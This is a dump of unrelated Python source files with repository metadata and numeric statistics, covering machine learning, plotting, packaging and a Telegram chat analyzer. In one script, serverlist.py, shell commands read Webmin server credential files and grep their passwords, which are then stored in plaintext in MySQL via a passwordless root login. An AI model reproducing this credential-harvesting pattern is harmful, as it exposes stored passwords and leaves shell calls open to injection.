a7d18623cd14a2ffd2508a4bb6a71b06a5f26215
|
[
"MIT"
] | null | null | null |
import warnings
warnings.filterwarnings('ignore') #ignore warnings to print values properly
import logging
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.colors import ListedColormap
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn import metrics
from datetime import datetime
from plotter import Plotter
class Classifier:
# constructor
def __init__(self, conn, repo_user, repo_name):
self.conn = conn
self.repository_id = self._get_repository_id(repo_user, repo_name)
self.dic_classifier = {
'decisiontree': ["../output/decisiontreeplot.png", "Decision Tree", DecisionTreeClassifier(criterion="entropy", max_depth=3)],
'naivebayes': ["../output/nbplot.png", "Naive Bayes", GaussianNB()],
'knn': ["../output/knnplot.png", "K-Nearest Neighbors (3)", KNeighborsClassifier(n_neighbors=3)]
}
logging.basicConfig(filename="../output/returninfo.log", level=logging.INFO)
def _get_repository_id(self, repo_user, repo_name):
cursor_conn = self.conn.cursor()
sql = "SELECT Id FROM Repositories WHERE Name = ?"
cursor_conn.execute(sql, ["{}/{}".format(repo_user, repo_name)])
id = 0
cursor_fetch = cursor_conn.fetchone()
if cursor_fetch:
id = cursor_fetch[0]
return id
def _print_scores(self, classifier, X, y, test_size):
# Split dataset into training set and test set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=1)
# Train Decision Tree Classifer
classifier.fit(X_train, y_train)
# Predict the response for test dataset
y_pred = classifier.predict(X_test)
print(" Accuracy:", metrics.accuracy_score(y_test, y_pred))
logging.info(" Accuracy: {}".format(metrics.accuracy_score(y_test, y_pred)))
print(" F1-Score:", metrics.f1_score(y_test, y_pred))
logging.info(" F1-Score: {}".format(metrics.f1_score(y_test, y_pred)))
print(" Precision:", metrics.precision_score(y_test, y_pred))
logging.info(" Precision: {}".format(metrics.precision_score(y_test, y_pred)))
print(" Recall:", metrics.recall_score(y_test, y_pred))
logging.info(" Recall: {}".format(metrics.recall_score(y_test, y_pred)))
#print(" Confusion Matrix:", metrics.confusion_matrix(y_test, y_pred))
def classify(self, classifier_key):
if classifier_key in self.dic_classifier:
dic_item = self.dic_classifier[classifier_key]
classifier_path_plot_file = dic_item[0]
classifier_name = dic_item[1]
classifier_obj = dic_item[2]
print("repository_id = '{}'".format(self.repository_id))
#Get X, y arrays for classification, normalized data
sql = "SELECT AuthorInfluencer, ClosedIssues, ClosedPullRequests, ClosedIssuesInfluencer, ClosedPullRequestsInfluencer, PrereleaseClass FROM ReleasesData WHERE IdRepository = ?;"
dataset = pd.read_sql_query(sql, self.conn, params=str(self.repository_id))
X = dataset[['ClosedIssuesInfluencer', 'ClosedPullRequestsInfluencer']]
y = dataset['PrereleaseClass'] # contains the values from the "Class" column
self._print_scores(classifier_obj, X, y, test_size = 0.2)
plotter = Plotter(classifier_name, classifier_obj, X, y)
plotter.plot(classifier_path_plot_file)
print("File '{}' plotted from current data and classifier '{}'".format(classifier_path_plot_file, classifier_name))
logging.info("File '{}' plotted from current data and classifier '{}'".format(classifier_path_plot_file, classifier_name))
else:
print("{} :: classifier_key{} not found. Supported ones are: 'decisiontree', 'naivebayes', 'knn'".format(datetime.today().strftime('%Y-%m-%d-%H:%M:%S'), classifier_key))
logging.info("{} :: classifier_key{} not found. Supported ones are: 'decisiontree', 'naivebayes', 'knn'".format(datetime.today().strftime('%Y-%m-%d-%H:%M:%S'), classifier_key))
| 50.244186
| 190
| 0.682249
| 526
| 4,321
| 5.385932
| 0.288973
| 0.022944
| 0.019061
| 0.031768
| 0.249912
| 0.235792
| 0.228733
| 0.133427
| 0.133427
| 0.133427
| 0
| 0.004342
| 0.200417
| 4,321
| 85
| 191
| 50.835294
| 0.81563
| 0.076603
| 0
| 0
| 0
| 0
| 0.228586
| 0.044461
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0.203125
| 0
| 0.296875
| 0.140625
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b56dd907e3a9ba7c7134351a3ded86b0fead6823
| 183
|
py
|
Python
|
run.py
|
sgilhuly/mire
|
8ac07af9083831a03a1901c1bb655932111ae4cf
|
[
"MIT"
] | 2
|
2020-06-15T10:51:43.000Z
|
2020-08-02T07:38:44.000Z
|
run.py
|
sgilhuly/mire
|
8ac07af9083831a03a1901c1bb655932111ae4cf
|
[
"MIT"
] | null | null | null |
run.py
|
sgilhuly/mire
|
8ac07af9083831a03a1901c1bb655932111ae4cf
|
[
"MIT"
] | 1
|
2018-05-15T04:45:37.000Z
|
2018-05-15T04:45:37.000Z
|
import sys
from app import app, socketio
if __name__ == "__main__":
if len(sys.argv) > 1:
port = int(sys.argv[1])
else:
port=5000
socketio.run(app, host="0.0.0.0", port=port)
| 18.3
| 45
| 0.661202
| 33
| 183
| 3.424242
| 0.545455
| 0.053097
| 0.141593
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065789
| 0.169399
| 183
| 10
| 45
| 18.3
| 0.677632
| 0
| 0
| 0
| 0
| 0
| 0.081522
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b56fc2f3040d889070f9fe524690dd7b2af07b3c
| 1,004
|
py
|
Python
|
pyFoam/extractForces.py
|
mjsauvinen/P4US
|
ba7bbc77a6e482f612ba5aa5f021a41fcbb23345
|
[
"MIT"
] | 4
|
2017-06-10T13:34:29.000Z
|
2021-10-08T14:33:43.000Z
|
pyFoam/extractForces.py
|
mjsauvinen/P4US
|
ba7bbc77a6e482f612ba5aa5f021a41fcbb23345
|
[
"MIT"
] | 8
|
2018-07-10T12:00:49.000Z
|
2021-09-16T13:58:59.000Z
|
pyFoam/extractForces.py
|
mjsauvinen/P4US
|
ba7bbc77a6e482f612ba5aa5f021a41fcbb23345
|
[
"MIT"
] | 6
|
2019-05-03T07:29:12.000Z
|
2022-01-21T03:10:27.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import numpy as np
import pylab as pl
from txtTools import openIOFile
# =*=*=*=* FUNCTION DEFINITIONS *=*=*=*=*=*=*=*=*=*=*=*
def isolateValues( line , stripChars ):
v = []
sl = line.split()
for i in xrange(len(sl)):
for sc in stripChars:
sl[i] = sl[i].strip(sc)
for s in sl:
v.append(float(s))
return v
# =*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
try:
factor = sys.argv[1]
except:
factor = 1.
factor = float(factor)
f = openIOFile('forces.dat', 'r')
oc = openIOFile('forces.cmp', 'w')
ot = openIOFile('forces.tot', 'w')
lines = f.readlines()
spr = ['(',')']
Fx = np.zeros(4,float)
for l in lines[1:]:
x = np.array(isolateValues(l,spr))
if( len(x) == 13 ):
x.tofile(oc,sep=" \t"); oc.write("\n")
Fx[0] = x[0]
for i in xrange(1,len(Fx)):
Fx[i]=factor*(x[i]+x[i+3]) # Pressure + Viscous
Fx.tofile(ot, sep=" \t"); ot.write("\n")
f.close(); oc.close(); ot.close()
| 20.489796
| 55
| 0.531873
| 150
| 1,004
| 3.56
| 0.48
| 0.089888
| 0.022472
| 0.044944
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014907
| 0.198207
| 1,004
| 49
| 56
| 20.489796
| 0.648447
| 0.168327
| 0
| 0
| 0
| 0
| 0.054152
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030303
| false
| 0
| 0.121212
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5742eb898932211cf75e05e216d0c94c86949cb
| 418
|
py
|
Python
|
examples/select.py
|
GBS3/cues
|
09bce776f9275b71a4028e5c59103e45d81ebed6
|
[
"MIT"
] | 1
|
2021-09-13T02:29:43.000Z
|
2021-09-13T02:29:43.000Z
|
examples/select.py
|
giosali/cues
|
09bce776f9275b71a4028e5c59103e45d81ebed6
|
[
"MIT"
] | null | null | null |
examples/select.py
|
giosali/cues
|
09bce776f9275b71a4028e5c59103e45d81ebed6
|
[
"MIT"
] | 1
|
2021-05-26T04:35:47.000Z
|
2021-05-26T04:35:47.000Z
|
"""
examples.select
===============
An example that demonstrates the Select child class.
"""
from cues.cues import Select
def main():
name = 'programming_language'
message = 'Which of these is your favorite programming language?'
options = ['Python', 'JavaScript', 'C++', 'C#']
cue = Select(name, message, options)
answer = cue.send()
print(answer)
if __name__ == '__main__':
main()
| 18.173913
| 69
| 0.629187
| 48
| 418
| 5.291667
| 0.6875
| 0.149606
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.205742
| 418
| 22
| 70
| 19
| 0.76506
| 0.203349
| 0
| 0
| 0
| 0
| 0.313846
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.1
| 0
| 0.2
| 0.1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b57f76841f0c85c583ef9797290a21bbf823a12e
| 2,212
|
py
|
Python
|
model_metadata/utils.py
|
csdms/model_metadata
|
62acab7ae2a152bec64bc1f52751f7a8aa1d4184
|
[
"MIT"
] | 1
|
2021-05-25T14:38:10.000Z
|
2021-05-25T14:38:10.000Z
|
model_metadata/utils.py
|
csdms/model_metadata
|
62acab7ae2a152bec64bc1f52751f7a8aa1d4184
|
[
"MIT"
] | 3
|
2018-04-05T21:50:24.000Z
|
2021-04-02T03:54:04.000Z
|
model_metadata/utils.py
|
csdms/model_metadata
|
62acab7ae2a152bec64bc1f52751f7a8aa1d4184
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
import os
import sys
from .api import install as install_mmd
def model_data_dir(name, datarootdir=None):
"""Get a model's data dir.
Parameters
----------
name : str
The name of the model.
Returns
-------
str
The absolute path to the data directory for the model.
"""
datarootdir = datarootdir or os.path.join(sys.prefix, "share")
return os.path.join(datarootdir, "csdms", name)
def get_cmdclass(paths, cmdclass=None):
cmdclass = {} if cmdclass is None else cmdclass.copy()
if "setuptools" in sys.modules:
from setuptools.command.develop import develop as _develop
from setuptools.command.install import install as _install
else:
from distutils.command.develop import develop as _develop
from distutils.command.install import install as _install
sharedir = os.path.join(sys.prefix, "share")
class install(_install):
def run(self):
_install.run(self)
for name, path in paths:
name = name.split(":")[-1]
install_mmd(
os.path.abspath(path),
os.path.join(sharedir, "csdms", name),
silent=False,
clobber=True,
develop=False,
)
class develop(_develop):
def run(self):
_develop.run(self)
for name, path in paths:
name = name.split(":")[-1]
install_mmd(
os.path.abspath(path),
os.path.join(sharedir, "csdms", name),
silent=False,
clobber=True,
develop=True,
)
cmdclass["install"] = install
cmdclass["develop"] = develop
return cmdclass
def get_entry_points(components, entry_points=None):
entry_points = {} if entry_points is None else entry_points
pymt_plugins = entry_points.get("pymt.plugins", [])
for entry_point, _ in components:
pymt_plugins.append(entry_point)
if len(pymt_plugins) > 0:
entry_points["pymt.plugins"] = pymt_plugins
return entry_points
| 26.97561
| 66
| 0.574593
| 252
| 2,212
| 4.924603
| 0.277778
| 0.070911
| 0.04029
| 0.053183
| 0.357776
| 0.357776
| 0.26108
| 0.196616
| 0.196616
| 0.196616
| 0
| 0.002015
| 0.326854
| 2,212
| 81
| 67
| 27.308642
| 0.83143
| 0.084087
| 0
| 0.32
| 0
| 0
| 0.037821
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.14
| 0
| 0.34
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b582e5842d21e445f1825c2debc8042c425aedda
| 8,060
|
py
|
Python
|
solution/serverlist.py
|
ksh0165/lhms
|
8848a74ac5c0f309e3ab28583af4bd574575ab8a
|
[
"Apache-2.0"
] | null | null | null |
solution/serverlist.py
|
ksh0165/lhms
|
8848a74ac5c0f309e3ab28583af4bd574575ab8a
|
[
"Apache-2.0"
] | null | null | null |
solution/serverlist.py
|
ksh0165/lhms
|
8848a74ac5c0f309e3ab28583af4bd574575ab8a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
import os
import subprocess
import re
import pymysql
from datetime import datetime
strPath = r"/etc/webmin/servers";# file dir
files = os.listdir(strPath)
lists = [];# file lists
host = [];
user = [];
pwd = [];
val = 0;# extractServer use
test = "";# grep host
test1 = "";# grep user
test2 = "";# grep pass
test3 = "";# Text = remove
test5 = "";# Text /n remove
test7 = "";# Text1 ' remove
test9 = "";# Text1 /n remove
#retry = "";# fail use filename show : no use
cnt1 = 0;# array file wc total count
filelenlist = [];# files wc total list
filelentotallist = ""; #files wc total list make word and reset
finallist = []; # after less 11 rows romeve then finally list
lenlist = [];
fcnt = [];# length 11 less count list
frows = 0;# length 11 less count
hs = "";# host
us = "";# user
ps = "";# pass
rows = 0;# file wc -l
row = 0;# file wc -l
count = 0;# total file count for 11 less count
servers = "";
#total = [];# value total : no use
##########################################################################################
# FUNCTION
##########################################################################################
def extractServer(server):
val = server.index('.')
result = server[:val]
return str(result).replace('[]','').replace('[', '').replace(']', '').replace("'",'')
def extractText1(text1):
#result = re.findall(r'^=[0-9]+(?:\.[0-9]+)', text)
result = re.findall(r'\d+',str(text1))
return str(result).replace('[]','').replace('[', '').replace(']', '').replace("'",'')
#def extractFile(file):
# result = re.search(r'.*[.].*$', file)
# return str(result).replace('[]','').replace('[', '').replace(']', '').replace("'",'')
def extractIp(ip):
result = re.findall(r'[0-9]+(?:\.[0-9]+){3}', ip)
return str(result).replace('[]','').replace('[', '').replace(']', '').replace("'",'')
#regex1 = re.compile(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$')
def extractText(text):
#result = re.findall(r'^=[0-9]+(?:\.[0-9]+)', text)
test3 = text.index('=')
test5 = text.index('\n')
result = text[test3+1:test5]
return str(result).replace('[]','').replace('[', '').replace(']', '').replace("'",'')
print("files = %s" % files)
servs = [file for file in files if file.endswith(".serv")]
cnt = 0;
now1 = datetime.now()
now = now1.strftime("%Y")+now1.strftime("%m")+now1.strftime("%d")
print("now = %s" %now);
print("servs = %s" % servs);
print("servs len = %s" % len(servs));
db = pymysql.connect(host='172.20.0.3', port=3306, user='root', passwd='', db='hms',charset='utf8',autocommit=True)
cursor = db.cursor()
##########################################################################################
# SERVER LIST PASING & MARIADB INSERT
##########################################################################################
for serve in servs:
print("===================================================");
print("start row 11 less count check servs = %s : " % servs);
print("start row 11 less count check serve = %s : " % serve);
print("===================================================");
print("now count = %s :" % count);
lenlist.append(serve)
print("all lenlist count = %s :" % lenlist);
cnt2 = subprocess.check_output('cat /etc/webmin/servers/%s | wc -l' % lenlist[count],shell=True)
cnt1 = extractText1(cnt2)
filelenlist.append(cnt1)
print("now filelenlist = %s :" % filelenlist[count]);
#print("filelenlist.split() = %s : " % " ".join(filelenlist[count]));
#for y in range(filelenlist):
##filelenlist[count]
##for fll in filelenlist:
print("filelenlist[%d] = %s :" % (count, filelenlist));
## print("len(filelenlist) = %s :" % len(filelenlist));
#print("now fll = %s :" % fll);
#fl = fll.split(",")
filelentotallist = filelenlist[count]
print("now filelentotallist = %s :" % filelentotallist);
if filelentotallist == '11':
if count < len(servs):
#count = count + 1;
print("11 length ! pass ~~");
else:
fcnt.append(serve)
print(" no 11 length find ~~~ add value in fcnt + 1 = %s :" % count);
if count < len(servs):
#count = count + 1;
filelentotallist = "";
count = count + 1;
print("===================================================");
print("end row count = %s :" % count);
print("fcnt = %s :" % fcnt);
print("===================================================");
frows = len(fcnt)
print("frows = %s:" % frows);
##########################################################################################
# frows : less 11 rows -> craete new array and input filename and remove it
##########################################################################################
for removes in fcnt:
servs.remove(removes)
print(" alter remove less 11 rows servs = %s :" % servs);
try:
with cursor:
sql_d = "DELETE FROM tests"
cursor.execute(sql_d)
db.commit()
for serv in servs:
lists.append(serv)
print("-----------------------------------------------------");
print("lists[cnt] = %s cnt = %d : " % (lists[cnt], cnt));
rows = subprocess.check_output('cat /etc/webmin/servers/%s | wc -l' % lists[cnt],shell=True)
row = extractText1(rows)
print("-----------------------------------------------------");
print("row = %s cnt = %d : " % (row, cnt));
print("-----------------------------------------------------");
servers = extractServer(serv)
#total.append(servers)
print("fname = %s" % servers);
if row == "11":
test = subprocess.check_output('cat /etc/webmin/servers/%s | grep host' % lists[cnt],shell=True)
test1 = subprocess.check_output('cat /etc/webmin/servers/%s | grep user' % lists[cnt],shell=True)
test2 = subprocess.check_output('cat /etc/webmin/servers/%s | grep pass' % lists[cnt],shell=True)
hs = extractIp(test.decode('utf-8'))
host.append(hs)
print("host =%s" % host[cnt]);
print("host[%d] =%s" % (cnt,host[cnt]));
#total.append(hs)
us = extractText(test1.decode('utf-8'))
user.append(us)
print("user =%s" % user[cnt]);
print("user[%d] =%s" % (cnt,user[cnt]));
#total.append(us)
ps = extractText(test2.decode('utf-8'))
pwd.append(ps)
print("pwd =%s" %pwd[cnt]);
print("pwd[%d] =%s" % (cnt,pwd[cnt]));
#total.append(ps)
#cursor.execute("INSERT INTO tests(fname,host,user,pwd,inputdt) VALUES (%s,%s,%s,%s,%s)" % (servers,host[cnt],user[cnt],pwd[cnt],now))
sql = "INSERT INTO `tests` (`fname`,`host`,`user`,`pwd`,`inputdt`) VALUES (%s,%s,%s,%s,%s)"
#for i in servs:
cursor.execute(sql, (servers,host[cnt],user[cnt],pwd[cnt],now))
data = cursor.fetchall()
db.commit()
if cnt < len(servs):
cnt = cnt+1;
else:
#print("cnt = %d:" % cnt);
#retry = servs[cnt]
#print("retry = %s : " % retry);
#if cnt < len(servs)-1:
# cnt = cnt;
# print("cnt = %d , cnt < len(servs):" % cnt);
# print("lists[cnt] = %s cnt = %d : " % (lists[cnt], cnt));
# continue
pass
#else:
# cnt = cnt;
# print("cnt = %d , cnt = len(servs): " % cnt);
# print("lists[cnt] = %s cnt = %d : " % (lists[cnt], cnt));
# continue
# pass
finally:
db.close()
print("servs = %s" % servs)
print("The currnt directory is: %s" % strPath)
| 42.198953
| 150
| 0.458561
| 863
| 8,060
| 4.274623
| 0.202781
| 0.056926
| 0.056926
| 0.029818
| 0.278124
| 0.261317
| 0.261317
| 0.208187
| 0.149092
| 0.088371
| 0
| 0.017614
| 0.25335
| 8,060
| 190
| 151
| 42.421053
| 0.595381
| 0.220596
| 0
| 0.140741
| 0
| 0.007407
| 0.230173
| 0.093937
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02963
| false
| 0.02963
| 0.037037
| 0
| 0.096296
| 0.259259
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b58403121af69cb7645522d11585b8ed10c27038
| 579
|
py
|
Python
|
algorithms/tree_level_width.py
|
danielhgasparin/algorithms-python
|
4b27c3cddd22762599fe55d3b760f388733c4fa7
|
[
"MIT"
] | null | null | null |
algorithms/tree_level_width.py
|
danielhgasparin/algorithms-python
|
4b27c3cddd22762599fe55d3b760f388733c4fa7
|
[
"MIT"
] | null | null | null |
algorithms/tree_level_width.py
|
danielhgasparin/algorithms-python
|
4b27c3cddd22762599fe55d3b760f388733c4fa7
|
[
"MIT"
] | null | null | null |
"""Tree level width module."""
from collections import deque
def tree_level_width(tree):
"""Return a list containing the width of each level of the specified tree."""
result = []
count = 0
queue = deque([tree.root, "s"])
while len(queue) > 0:
node = queue.popleft()
if node == "s":
if(count == 0):
break
else:
result.append(count)
count = 0
queue.append("s")
else:
count += 1
queue.extend(node.children)
return result
| 26.318182
| 81
| 0.504318
| 66
| 579
| 4.393939
| 0.515152
| 0.062069
| 0.096552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014006
| 0.38342
| 579
| 22
| 82
| 26.318182
| 0.798319
| 0.165803
| 0
| 0.222222
| 0
| 0
| 0.006342
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.055556
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b58c5490649547fd191436f9730cc2a2c51f3b00
| 3,619
|
py
|
Python
|
src/utils.py
|
Flantropy/TelegramChatAnalyzer
|
88e879fa771361d47292721ff8adfd82a74e9b93
|
[
"MIT"
] | null | null | null |
src/utils.py
|
Flantropy/TelegramChatAnalyzer
|
88e879fa771361d47292721ff8adfd82a74e9b93
|
[
"MIT"
] | null | null | null |
src/utils.py
|
Flantropy/TelegramChatAnalyzer
|
88e879fa771361d47292721ff8adfd82a74e9b93
|
[
"MIT"
] | null | null | null |
import json
import logging
from io import BytesIO
from typing import List
from typing import Optional
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
from telegram import InputMediaPhoto
def __convert_plot_to_telegram_photo(plot) -> InputMediaPhoto:
with BytesIO() as buffer:
plot.figure.savefig(buffer)
plot.clear()
photo = InputMediaPhoto(buffer.getvalue())
return photo
def _unpack_telegram_document(update) -> dict:
"""
This function retrieves JSON representation of a chat history
from given telegram.Update
"""
document = update.message.document.get_file()
chat_file = BytesIO(document.download_as_bytearray())
chat_json = json.load(chat_file)
return chat_json
def _form_data_frame_from_json(chat_json) -> Optional[pd.DataFrame]:
try:
messages_df = pd.DataFrame(
chat_json['messages'],
columns=['id', 'type', 'date', 'from', 'text', 'media_type'])
except KeyError as e:
logging.getLogger().error(
msg=f'Unable to form DataFrame from json. '
f'Key "messages" not found. {e}'
)
return
else:
messages_df.set_index('id', inplace=True)
messages_df['date'] = pd.to_datetime(messages_df['date'])
return messages_df
def _make_barplot(messages_df: pd.DataFrame) -> InputMediaPhoto:
"""
:param messages_df: DataFrame with user messaging history
:return: telegram.InputMediaPhoto
"""
messages_per_month = messages_df['date'] \
.groupby(messages_df['date'].dt.to_period('M')) \
.agg('count')
plot = sns.barplot(
x=messages_per_month.index,
y=messages_per_month.values,
color=(0.44, 0.35, 0.95)
)
plt.xticks(rotation=45)
plt.title('All time history')
return __convert_plot_to_telegram_photo(plot)
def _make_kde_plot(messages_df: pd.DataFrame) -> InputMediaPhoto:
plot = sns.kdeplot(
x=messages_df['date'],
hue=messages_df['from'],
shade=True
)
plt.title('Activity by user')
plt.xticks(rotation=45)
plt.xlabel('')
return __convert_plot_to_telegram_photo(plot)
def _make_media_distribution_bar_plot(messages_df: pd.DataFrame) -> Optional[InputMediaPhoto]:
logging.getLogger().info('Enter media dist function')
media_dist_df = messages_df[['from', 'media_type']].value_counts()
if media_dist_df.empty:
return
media_dist_plot = media_dist_df.unstack().plot(
kind='bar',
stacked=True,
ylabel='Media messages',
xlabel='User'
)
plt.xticks(rotation=0)
plt.title('Distribution of media messages')
return __convert_plot_to_telegram_photo(media_dist_plot)
def _make_weekday_distribution_bar_plot(messages_df: pd.DataFrame) -> InputMediaPhoto:
dist_by_day_of_week = messages_df['from']\
.groupby(messages_df['date'].dt.weekday)\
.agg('value_counts')
plot = dist_by_day_of_week.unstack().plot(kind='bar')
plt.xlabel('')
plt.ylabel('Messages')
plt.xticks(
list(range(7)),
['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun'],
rotation=0
)
return __convert_plot_to_telegram_photo(plot)
def make_plots(messages_df: pd.DataFrame) -> List[InputMediaPhoto]:
sns.set_theme(context='paper')
photo_list = [
_make_barplot(messages_df),
_make_media_distribution_bar_plot(messages_df),
_make_kde_plot(messages_df),
_make_weekday_distribution_bar_plot(messages_df),
]
return [p for p in photo_list if p is not None]
| 30.411765
| 94
| 0.671733
| 464
| 3,619
| 4.950431
| 0.318966
| 0.095777
| 0.031345
| 0.054854
| 0.26121
| 0.182847
| 0.131911
| 0.05616
| 0.05616
| 0
| 0
| 0.005622
| 0.213595
| 3,619
| 118
| 95
| 30.669492
| 0.801476
| 0.049738
| 0
| 0.096774
| 0
| 0
| 0.091765
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086022
| false
| 0
| 0.096774
| 0
| 0.290323
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b58c5890c2ea7e046b469064a62ceb8bea1ea212
| 2,215
|
py
|
Python
|
pyxrd/calculations/improve.py
|
PyXRD/pyxrd
|
26bacdf64f3153fa74b8caa62e219b76d91a55c1
|
[
"BSD-2-Clause"
] | 27
|
2018-06-15T15:28:18.000Z
|
2022-03-10T12:23:50.000Z
|
pyxrd/calculations/improve.py
|
PyXRD/pyxrd
|
26bacdf64f3153fa74b8caa62e219b76d91a55c1
|
[
"BSD-2-Clause"
] | 22
|
2018-06-14T08:29:16.000Z
|
2021-07-05T13:33:44.000Z
|
pyxrd/calculations/improve.py
|
PyXRD/pyxrd
|
26bacdf64f3153fa74b8caa62e219b76d91a55c1
|
[
"BSD-2-Clause"
] | 8
|
2019-04-13T13:03:51.000Z
|
2021-06-19T09:29:11.000Z
|
# coding=UTF-8
# ex:ts=4:sw=4:et=on
# Copyright (c) 2013, Mathijs Dumon
# All rights reserved.
# Complete license can be found in the LICENSE file.
from io import StringIO
from scipy.optimize import fmin_l_bfgs_b
from .exceptions import wrap_exceptions
def setup_project(projectf):
from pyxrd.file_parsers.json_parser import JSONParser
from pyxrd.project.models import Project
type(Project).object_pool.clear()
f = StringIO(projectf)
project = JSONParser.parse(f)
f.close()
return project
@wrap_exceptions
def run_refinement(projectf, mixture_index):
"""
Runs a refinement setup for
- projectf: project data
- mixture_index: what mixture in the project to use
"""
if projectf is not None:
from pyxrd.data import settings
settings.initialize()
# Retrieve project and mixture:
project = setup_project(projectf)
del projectf
import gc
gc.collect()
mixture = project.mixtures[mixture_index]
mixture.refinement.update_refinement_treestore()
refiner = mixture.refinement.get_refiner()
refiner.refine()
return list(refiner.history.best_solution), refiner.history.best_residual
@wrap_exceptions
def improve_solution(projectf, mixture_index, solution, residual, l_bfgs_b_kwargs={}):
if projectf is not None:
from pyxrd.data import settings
settings.initialize()
# Retrieve project and mixture:
project = setup_project(projectf)
del projectf
mixture = project.mixtures[mixture_index]
with mixture.data_changed.ignore():
# Setup context again:
mixture.update_refinement_treestore()
refiner = mixture.refinement.get_refiner()
# Refine solution
vals = fmin_l_bfgs_b(
refiner.get_residual,
solution,
approx_grad=True,
bounds=refiner.ranges,
**l_bfgs_b_kwargs
)
new_solution, new_residual = tuple(vals[0:2])
# Return result
return new_solution, new_residual
else:
return solution, residual
| 27.012195
| 86
| 0.648307
| 254
| 2,215
| 5.484252
| 0.42126
| 0.043073
| 0.017229
| 0.014358
| 0.315865
| 0.26705
| 0.26705
| 0.26705
| 0.18234
| 0.18234
| 0
| 0.005643
| 0.27991
| 2,215
| 81
| 87
| 27.345679
| 0.867712
| 0.163883
| 0
| 0.340426
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06383
| false
| 0
| 0.170213
| 0
| 0.319149
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b58ccbfff32cc054d600f5f7877ef4514f099933
| 931
|
py
|
Python
|
enforceTH.py
|
Multivalence/enforceTypeHint
|
fb87fd48baa525044516ddbdf2160128e03fb7b7
|
[
"MIT"
] | null | null | null |
enforceTH.py
|
Multivalence/enforceTypeHint
|
fb87fd48baa525044516ddbdf2160128e03fb7b7
|
[
"MIT"
] | null | null | null |
enforceTH.py
|
Multivalence/enforceTypeHint
|
fb87fd48baa525044516ddbdf2160128e03fb7b7
|
[
